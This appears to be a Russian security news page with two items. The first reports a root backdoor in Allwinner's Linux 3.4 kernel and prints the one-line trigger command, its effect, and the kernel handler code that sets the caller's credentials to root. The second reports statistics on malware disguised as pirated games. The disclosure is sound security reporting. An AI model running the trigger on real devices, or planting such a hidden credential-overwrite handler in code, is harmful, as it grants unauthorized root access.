Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".

   $ id
   uid=1000(user) gid=1000(user) 
   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
   $ id
   uid=0(root) gid=0(root) 

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno, пишет opennet.ru.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:

        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10. 

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Спрятанные в пиратских видеоиграх вредоносы атаковали почти 1 млн юзеров

Эксперты антивирусной компании «Лаборатория Касперского» собрали статистику за 12 месяцев, согласно которой пользователи 930 тыс. раз пытались скачать вредоносные программы под видом популярных нелицензионных игр.

Согласно отчету (PDF), самой привлекательной игрой для скачивания оказалась Minecraft — фейковую копию этой игры пытались скачать более 310 тысяч пользователей.

За Minecraft шли вредоносные программы, маскирующиеся под GTA 5 и Sims 4, — 112 тысяч и почти 105 тысяч соответственно.

Помимо этого, отлично работала схема распространения еще не вышедших новинок игровой индустрии, которые все ждут. Как минимум десятью ожидаемыми релизами прикрывались киберпреступники.

80% вредоносных программ пряталось под масками фейковых FIFA 20, Elder Scrolls 6 и Borderlands 3.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru